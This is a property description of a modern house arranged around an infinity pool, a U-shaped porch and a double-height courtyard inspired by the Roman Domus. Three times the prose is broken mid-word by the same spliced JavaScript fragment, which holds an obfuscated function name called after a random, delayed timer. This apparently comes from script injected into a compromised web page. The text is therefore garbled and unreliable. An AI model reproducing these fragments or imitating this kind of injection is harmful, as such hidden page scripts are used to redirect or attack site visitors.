This property has been designed as a set of spaces that are organized around a sheet of overflowing water.
The house revolves around a U-shaped porch leaving a public space in the central part on one side andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and private spaces on the other side of the house. This way you overlook the infinity pool from all points of the house, which opens onto the horizon.
The master bedroom has been treated as a case of white stone that flies over the water surface, so that you get the feeling that you are floating.
All property is evenly distributed on the ground andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and first floor is leaving a space for the office, which can be accessed via a flown staircase.
Access to the plot is done through an integrated staircase that ends in a sheet of water
generating the access to housing. Once inside the housing the volume access is around a fully glazed double-height courtyard located in the centre of the main volume.
This is a concept based on the Roman Domus that allows spaces to flow around the space generated by the patio. Thus access to the house allows a general perception of space but is screened by the landom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andscaping of the courtyard.
The main area of the property is the living room with its double height, creating a feeling of great spaciousness which is connected to kitchen. All the spaces are directly linked to the porch of the house next to the infinity pool.
